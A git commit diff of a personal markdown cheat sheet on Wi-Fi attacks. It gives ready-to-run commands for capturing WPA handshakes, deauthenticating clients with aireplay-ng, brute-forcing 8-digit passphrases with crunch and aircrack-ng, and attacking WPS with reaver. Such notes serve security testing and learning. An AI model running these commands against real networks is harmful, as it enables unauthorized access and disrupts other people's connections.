Update sections title

This commit is contained in:
Benoit S 2021-02-20 14:36:21 +09:00
parent 2637735f68
commit 5bd12c70c7

View file

@ -1,4 +1,4 @@
# Monitor mode ## Monitor mode
For my RTL8188EUS: For my RTL8188EUS:
``` ```
@ -6,7 +6,7 @@ ip link set wlanX down
iw dev wlanX set type monitor iw dev wlanX set type monitor
``` ```
# Scan networks ## Scan networks
All channels: All channels:
``` ```
@ -17,7 +17,7 @@ Specific channel:
airodump-ng -c 6 wlanX airodump-ng -c 6 wlanX
``` ```
# Save a capture of chosen BSSID ## Save a capture of chosen BSSID
``` ```
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
@ -32,15 +32,15 @@ aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
Then you should have an EAPOL/WPA handshake. Then you should have an EAPOL/WPA handshake.
# Crack WPA passphrase ## Crack WPA passphrase
## For a 8 digits scheme ### For a 8 digits scheme
``` ```
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
``` ```
# Wireshark ## Wireshark
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html> PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
@ -64,4 +64,4 @@ reaver -i wlanX -b 00:23:B1:82:84:xx
<https://github.com/ZerBea/hcxdumptool> <https://github.com/ZerBea/hcxdumptool>
<https://github.com/ZerBea/hcxtools> <https://github.com/ZerBea/hcxtools>
<https://wpa-sec.stanev.org/> <https://wpa-sec.stanev.org/>